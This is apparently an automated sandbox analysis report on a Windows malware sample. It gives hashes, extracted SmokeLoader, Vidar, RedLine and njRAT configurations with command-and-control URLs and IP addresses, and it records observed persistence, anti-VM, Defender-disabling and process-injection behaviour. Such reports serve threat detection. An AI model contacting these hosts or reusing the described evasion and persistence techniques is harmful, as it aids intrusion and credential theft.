Analysis
-
max time kernel
159s -
max time network
161s -
platform
windows10_x64 -
resource
win10-en -
submitted
06-09-2021 22:08
Static task
static1
Behavioral task
behavioral1
Sample
3a60e2f393e906944fc3f01e1e160a22.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
3a60e2f393e906944fc3f01e1e160a22.exe
Resource
win10-en
General
-
Target
3a60e2f393e906944fc3f01e1e160a22.exe
-
Size
201KB
-
MD5
3a60e2f393e906944fc3f01e1e160a22
-
SHA1
4350ffd3daf6c10d89c95b07bbfd67dbff452dc6
-
SHA256
abd8f8f1a74e9588e563fc30dfcff31218d5d87c84b13a3ad618bed7f1994171
-
SHA512
fc52c47bfc264eab3d7c63e6207911e522a2797b8d890f07d64b899d3cce02cf78a1ae8df09849240ccc0ac77dea9e2d4889eaaaf461ab1b052af3d2275b60f5
Malware Config
Extracted
smokeloader
2020
http://fazanaharahe1.xyz/
http://xandelissane2.xyz/
http://ustiassosale3.xyz/
http://cytheriata4.xyz/
http://ggiergionard5.xyz/
http://rrelleynaniy6.store/
http://danniemusoa7.store/
http://nastanizab8.store/
http://onyokandis9.store/
http://dmunaavank10.store/
http://gilmandros11.site/
http://cusanthana12.site/
http://willietjeana13.site/
http://ximusokall14.site/
http://blodinetisha15.site/
http://urydiahadyss16.club/
http://glasamaddama17.club/
http://marlingarly18.club/
http://alluvianna19.club/
http://xandirkaniel20.club/
Extracted
vidar
40.4
1002
https://romkaxarit.tumblr.com/
-
profile_id
1002
Extracted
redline
@Ebalosgory
77.83.175.169:11490
Extracted
njrat
62.33.159.162:5674
26c50014115b430
-
reg_key
26c50014115b430
-
splitter
@!#&^%$
Signatures
-
Contains code to disable Windows Defender 2 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\59BC.exe disable_win_def C:\Users\Admin\AppData\Local\Temp\59BC.exe disable_win_def -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/2880-159-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral2/memory/2880-160-0x000000000041C5F6-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 4076 created 2232 4076 WerFault.exe lrWRoY.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3044-123-0x0000000000400000-0x00000000021C1000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Executes dropped EXE 19 IoCs
Processes:
41BD.exe9AAB.exeEFC2.exeF437.exeF437.exeF437.exeF437.exeFB5C.exeFED8.exeAjg9D2tcl.exelrWRoY.exeMiner.exeMiner.exeMiner.exeMiner.exeMiner.exeMiner.exe56BD.exe59BC.exepid process 3044 41BD.exe 3636 9AAB.exe 1876 EFC2.exe 2040 F437.exe 4044 F437.exe 3512 F437.exe 2880 F437.exe 756 FB5C.exe 2564 FED8.exe 3636 Ajg9D2tcl.exe 2232 lrWRoY.exe 1580 Miner.exe 1432 Miner.exe 3640 Miner.exe 4068 Miner.exe 3980 Miner.exe 1148 Miner.exe 1584 56BD.exe 2040 59BC.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
9AAB.exeFB5C.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9AAB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9AAB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FB5C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FB5C.exe -
Deletes itself 1 IoCs
Processes:
pid process 3052 -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\9AAB.exe themida C:\Users\Admin\AppData\Local\Temp\9AAB.exe themida behavioral2/memory/3636-128-0x00000000001D0000-0x00000000001D1000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\FB5C.exe themida C:\Users\Admin\AppData\Local\Temp\FB5C.exe themida behavioral2/memory/756-180-0x00000000008C0000-0x00000000008C1000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 38 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinAppHost = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinAppHost.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinAppHost = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinAppHost.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinAppHost = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinAppHost.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinAppHost = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinAppHost.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinAppHost = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinAppHost.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinAppHost = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinAppHost.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinAppHost = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinAppHost.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinAppHost = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinAppHost.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinAppHost = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinAppHost.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinAppHost = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinAppHost.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinAppHost = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinAppHost.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinAppHost = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinAppHost.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinAppHost = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinAppHost.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinAppHost = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinAppHost.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinAppHost = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinAppHost.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinAppHost = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinAppHost.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinAppHost = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinAppHost.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinAppHost = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinAppHost.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinAppHost = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinAppHost.exe" reg.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
9AAB.exeFB5C.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 9AAB.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA FB5C.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
9AAB.exeFB5C.exepid process 3636 9AAB.exe 756 FB5C.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
3a60e2f393e906944fc3f01e1e160a22.exeF437.exelrWRoY.exedescription pid process target process PID 3792 set thread context of 1700 3792 3a60e2f393e906944fc3f01e1e160a22.exe 3a60e2f393e906944fc3f01e1e160a22.exe PID 2040 set thread context of 2880 2040 F437.exe F437.exe PID 2232 set thread context of 2196 2232 lrWRoY.exe RegSvcs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 17 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3960 3044 WerFault.exe 41BD.exe 4032 3044 WerFault.exe 41BD.exe 3788 3044 WerFault.exe 41BD.exe 1132 3044 WerFault.exe 41BD.exe 2256 3044 WerFault.exe 41BD.exe 2036 3044 WerFault.exe 41BD.exe 3980 3044 WerFault.exe 41BD.exe 184 3044 WerFault.exe 41BD.exe 1632 3044 WerFault.exe 41BD.exe 2268 3044 WerFault.exe 41BD.exe 3304 3044 WerFault.exe 41BD.exe 3972 3044 WerFault.exe 41BD.exe 4052 3044 WerFault.exe 41BD.exe 2248 3044 WerFault.exe 41BD.exe 2532 3044 WerFault.exe 41BD.exe 1356 3044 WerFault.exe 41BD.exe 4076 2232 WerFault.exe lrWRoY.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
3a60e2f393e906944fc3f01e1e160a22.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3a60e2f393e906944fc3f01e1e160a22.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3a60e2f393e906944fc3f01e1e160a22.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3a60e2f393e906944fc3f01e1e160a22.exe -
Processes:
41BD.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 41BD.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 41BD.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
3a60e2f393e906944fc3f01e1e160a22.exepid process 1700 3a60e2f393e906944fc3f01e1e160a22.exe 1700 3a60e2f393e906944fc3f01e1e160a22.exe 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 3052 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3052 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
3a60e2f393e906944fc3f01e1e160a22.exepid process 1700 3a60e2f393e906944fc3f01e1e160a22.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe9AAB.exeWerFault.exeF437.exeFED8.exeF437.exeFB5C.exeMiner.exeWerFault.exedescription pid process Token: SeRestorePrivilege 3960 WerFault.exe Token: SeBackupPrivilege 3960 WerFault.exe Token: SeDebugPrivilege 3960 WerFault.exe Token: SeDebugPrivilege 3788 WerFault.exe Token: SeDebugPrivilege 1132 WerFault.exe Token: SeDebugPrivilege 2256 WerFault.exe Token: SeDebugPrivilege 2036 WerFault.exe Token: SeDebugPrivilege 3980 WerFault.exe Token: SeDebugPrivilege 184 WerFault.exe Token: SeDebugPrivilege 1632 WerFault.exe Token: SeDebugPrivilege 2268 WerFault.exe Token: SeDebugPrivilege 3304 WerFault.exe Token: SeDebugPrivilege 3972 WerFault.exe Token: SeDebugPrivilege 4052 WerFault.exe Token: SeDebugPrivilege 2248 WerFault.exe Token: SeDebugPrivilege 2532 WerFault.exe Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeDebugPrivilege 3636 9AAB.exe Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeDebugPrivilege 1356 WerFault.exe Token: SeDebugPrivilege 2040 F437.exe Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeDebugPrivilege 2564 FED8.exe Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeDebugPrivilege 2880 F437.exe Token: SeDebugPrivilege 756 FB5C.exe Token: SeDebugPrivilege 1580 Miner.exe Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeDebugPrivilege 4076 WerFault.exe Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 Token: SeShutdownPrivilege 3052 Token: SeCreatePagefilePrivilege 3052 -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
EFC2.exepid process 1876 EFC2.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 3052 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
3a60e2f393e906944fc3f01e1e160a22.exeF437.exeFED8.exeAjg9D2tcl.execmd.execmd.execmd.exedescription pid process target process PID 3792 wrote to memory of 1700 3792 3a60e2f393e906944fc3f01e1e160a22.exe 3a60e2f393e906944fc3f01e1e160a22.exe PID 3792 wrote to memory of 1700 3792 3a60e2f393e906944fc3f01e1e160a22.exe 3a60e2f393e906944fc3f01e1e160a22.exe PID 3792 wrote to memory of 1700 3792 3a60e2f393e906944fc3f01e1e160a22.exe 3a60e2f393e906944fc3f01e1e160a22.exe PID 3792 wrote to memory of 1700 3792 3a60e2f393e906944fc3f01e1e160a22.exe 3a60e2f393e906944fc3f01e1e160a22.exe PID 3792 wrote to memory of 1700 3792 3a60e2f393e906944fc3f01e1e160a22.exe 3a60e2f393e906944fc3f01e1e160a22.exe PID 3792 wrote to memory of 1700 3792 3a60e2f393e906944fc3f01e1e160a22.exe 3a60e2f393e906944fc3f01e1e160a22.exe PID 3052 wrote to memory of 3044 3052 41BD.exe PID 3052 wrote to memory of 3044 3052 41BD.exe PID 3052 wrote to memory of 3044 3052 41BD.exe PID 3052 wrote to memory of 3636 3052 9AAB.exe PID 3052 wrote to memory of 3636 3052 9AAB.exe PID 3052 wrote to memory of 3636 3052 9AAB.exe PID 3052 wrote to memory of 1876 3052 EFC2.exe PID 3052 wrote to memory of 1876 3052 EFC2.exe PID 3052 wrote to memory of 1876 3052 EFC2.exe PID 3052 wrote to memory of 2040 3052 F437.exe PID 3052 wrote to memory of 2040 3052 F437.exe PID 3052 wrote to memory of 2040 3052 F437.exe PID 2040 wrote to memory of 4044 2040 F437.exe F437.exe PID 2040 wrote to memory of 4044 2040 F437.exe F437.exe PID 2040 wrote to memory of 4044 2040 F437.exe F437.exe PID 2040 wrote to memory of 3512 2040 F437.exe F437.exe PID 2040 wrote to memory of 3512 2040 F437.exe F437.exe PID 2040 wrote to memory of 3512 2040 F437.exe F437.exe PID 2040 wrote to memory of 2880 2040 F437.exe F437.exe PID 2040 wrote to memory of 2880 2040 F437.exe F437.exe PID 2040 wrote to memory of 2880 2040 F437.exe F437.exe PID 2040 wrote to memory of 2880 2040 F437.exe F437.exe PID 2040 wrote to memory of 2880 2040 F437.exe F437.exe PID 2040 wrote to memory of 2880 2040 F437.exe F437.exe PID 2040 wrote to memory of 2880 2040 F437.exe F437.exe PID 2040 wrote to memory of 2880 2040 F437.exe F437.exe PID 3052 wrote to memory of 756 3052 FB5C.exe PID 3052 wrote to memory of 756 3052 FB5C.exe PID 3052 wrote to memory of 756 3052 FB5C.exe PID 3052 wrote to memory of 2564 3052 FED8.exe PID 3052 wrote to memory of 2564 3052 FED8.exe PID 3052 wrote to memory of 2564 3052 FED8.exe PID 2564 wrote to memory of 3636 2564 FED8.exe Ajg9D2tcl.exe PID 2564 wrote to memory of 3636 2564 FED8.exe Ajg9D2tcl.exe PID 2564 wrote to memory of 3636 2564 FED8.exe Ajg9D2tcl.exe PID 2564 wrote to memory of 2232 2564 FED8.exe lrWRoY.exe PID 2564 wrote to memory of 2232 2564 FED8.exe lrWRoY.exe PID 2564 wrote to memory of 2232 2564 FED8.exe lrWRoY.exe PID 3636 wrote to memory of 4036 3636 Ajg9D2tcl.exe cmd.exe PID 3636 wrote to memory of 4036 3636 Ajg9D2tcl.exe cmd.exe PID 3636 wrote to memory of 4036 3636 Ajg9D2tcl.exe cmd.exe PID 4036 wrote to memory of 3640 4036 cmd.exe cmd.exe PID 4036 wrote to memory of 3640 4036 cmd.exe cmd.exe PID 4036 wrote to memory of 3640 4036 cmd.exe cmd.exe PID 4036 wrote to memory of 3512 4036 cmd.exe reg.exe PID 4036 wrote to memory of 3512 4036 cmd.exe reg.exe PID 4036 wrote to memory of 3512 4036 cmd.exe reg.exe PID 3640 wrote to memory of 2040 3640 cmd.exe cmd.exe PID 3640 wrote to memory of 2040 3640 cmd.exe cmd.exe PID 3640 wrote to memory of 2040 3640 cmd.exe cmd.exe PID 3636 wrote to memory of 908 3636 Ajg9D2tcl.exe cmd.exe PID 3636 wrote to memory of 908 3636 Ajg9D2tcl.exe cmd.exe PID 3636 wrote to memory of 908 3636 Ajg9D2tcl.exe cmd.exe PID 908 wrote to memory of 3064 908 cmd.exe cmd.exe PID 908 wrote to memory of 3064 908 cmd.exe cmd.exe PID 908 wrote to memory of 3064 908 cmd.exe cmd.exe PID 908 wrote to memory of 1580 908 cmd.exe reg.exe PID 908 wrote to memory of 1580 908 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3a60e2f393e906944fc3f01e1e160a22.exe"C:\Users\Admin\AppData\Local\Temp\3a60e2f393e906944fc3f01e1e160a22.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\3a60e2f393e906944fc3f01e1e160a22.exe"C:\Users\Admin\AppData\Local\Temp\3a60e2f393e906944fc3f01e1e160a22.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\41BD.exeC:\Users\Admin\AppData\Local\Temp\41BD.exe1⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 7562⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 8082⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 7402⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 8202⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 9522⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 9762⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 13922⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 13522⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 16562⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 15722⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 16642⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 17482⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 17202⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 13522⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3044 -s 16402⤵
